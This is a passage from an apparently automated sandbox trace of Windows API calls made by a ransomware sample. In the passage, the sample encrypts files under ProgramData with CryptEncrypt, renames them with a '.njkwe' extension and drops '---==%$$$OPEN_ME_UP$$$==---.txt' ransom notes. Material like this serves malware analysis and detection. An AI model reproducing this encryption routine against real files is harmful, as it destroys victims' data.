lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.154] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0074.156] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0074.156] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0074.156] CloseHandle (hObject=0x434) returned 1 [0074.156] GetProcessHeap () returned 0xbe0000 [0074.156] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.156] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0074.156] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0074.157] GetProcessHeap () returned 0xbe0000 [0074.157] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0074.157] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0074.157] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0074.157] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0074.157] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0074.157] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0074.157] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0074.157] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov") returned 85 [0074.157] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0074.157] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0074.157] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.157] GetProcessHeap () returned 0xbe0000 [0074.157] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.157] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*") returned 87 [0074.157] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e20 [0074.157] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.157] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.157] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.158] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.158] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.158] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\.") returned 87 [0074.158] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.158] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.158] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.158] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.158] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.158] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.158] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.158] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\..") returned 88 [0074.158] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.158] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.158] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0074.158] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0074.158] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0074.158] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0074.158] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0074.158] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0074.158] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime") returned 93 [0074.158] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0074.158] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0074.158] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.158] GetProcessHeap () returned 0xbe0000 [0074.158] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0074.158] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*") returned 95 [0074.158] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a220 [0074.158] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.159] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.159] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.159] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.159] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.159] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\.") returned 95 [0074.159] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.159] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.159] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.159] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.159] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.159] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.159] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.159] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\..") returned 96 [0074.159] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.159] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.159] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e3557c, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e3557c, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e3557c, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_Policy.provxml", cAlternateFileName="")) returned 1 [0074.159] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Windows") returned -1 [0074.159] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="$Recycle.bin") returned 1 [0074.159] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="System Volume Information") returned -1 [0074.159] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files") returned -1 [0074.159] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files (x86)") returned -1 [0074.159] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\0__Power_Policy.provxml") returned 117 [0074.159] StrStrIW (lpFirst="0__Power_Policy.provxml", lpSrch=".njkwe") returned 0x0 [0074.159] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.159] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="taridd") returned -1 [0074.159] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\0__Power_Poli", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.159] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\0__power_policy.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0074.160] GetTickCount () returned 0x1152e50 [0074.160] GetTickCount () returned 0x1152e50 [0074.160] GetTickCount () returned 0x1152e50 [0074.160] GetTickCount () returned 0x1152e50 [0074.160] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0074.160] GetProcessHeap () returned 0xbe0000 [0074.160] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4f858 [0074.160] ReadFile (in: hFile=0x43c, lpBuffer=0xc4f858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesRead=0x380edc4*=0x71e, lpOverlapped=0x0) returned 1 [0074.236] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffff8e2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.236] WriteFile (in: hFile=0x43c, lpBuffer=0xc4f858*, nNumberOfBytesToWrite=0x71e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesWritten=0x380edc4*=0x71e, lpOverlapped=0x0) returned 1 [0074.238] GetProcessHeap () returned 0xbe0000 [0074.238] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4f858 | out: hHeap=0xbe0000) returned 1 [0074.238] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.238] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0074.238] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0074.238] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0074.238] CloseHandle (hObject=0x43c) returned 1 [0074.238] GetProcessHeap () returned 0xbe0000 [0074.239] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0074.239] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe") returned 137 [0074.239] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\0__power_policy.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\0__power_policy.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0074.240] GetProcessHeap () returned 0xbe0000 [0074.240] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0074.241] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e3557c, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e3557c, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e3557c, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_Policy.provxml", cAlternateFileName="")) returned 0 [0074.241] FindClose (in: hFindFile=0xc1a220 | out: hFindFile=0xc1a220) returned 1 [0074.241] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0074.241] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0074.242] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0074.243] CloseHandle (hObject=0x438) returned 1 [0074.244] GetProcessHeap () returned 0xbe0000 [0074.244] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0074.244] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e5b7d8, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e5b7d8, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e5b7d8, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x243, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0074.244] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0074.244] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0074.244] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0074.244] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0074.244] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0074.244] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml") returned 97 [0074.244] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0074.244] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.244] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0074.244] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.244] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0074.244] GetTickCount () returned 0x1152e9e [0074.244] GetTickCount () returned 0x1152e9e [0074.244] GetTickCount () returned 0x1152e9e [0074.244] GetTickCount () returned 0x1152e9e [0074.244] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0074.244] GetProcessHeap () returned 0xbe0000 [0074.245] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4e850 [0074.245] ReadFile (in: hFile=0x438, lpBuffer=0xc4e850, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesRead=0x380f04c*=0x243, lpOverlapped=0x0) returned 1 [0074.245] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffdbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.246] WriteFile (in: hFile=0x438, lpBuffer=0xc4e850*, nNumberOfBytesToWrite=0x243, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesWritten=0x380f04c*=0x243, lpOverlapped=0x0) returned 1 [0074.246] GetProcessHeap () returned 0xbe0000 [0074.246] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4e850 | out: hHeap=0xbe0000) returned 1 [0074.246] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.246] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0074.248] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0074.248] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0074.248] CloseHandle (hObject=0x438) returned 1 [0074.248] GetProcessHeap () returned 0xbe0000 [0074.248] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0074.248] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0074.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0074.390] GetProcessHeap () returned 0xbe0000 [0074.390] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0074.390] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e5b7d8, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e5b7d8, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e5b7d8, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x243, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0074.391] FindClose (in: hFindFile=0xc19e20 | out: hFindFile=0xc19e20) returned 1 [0074.391] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0074.391] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 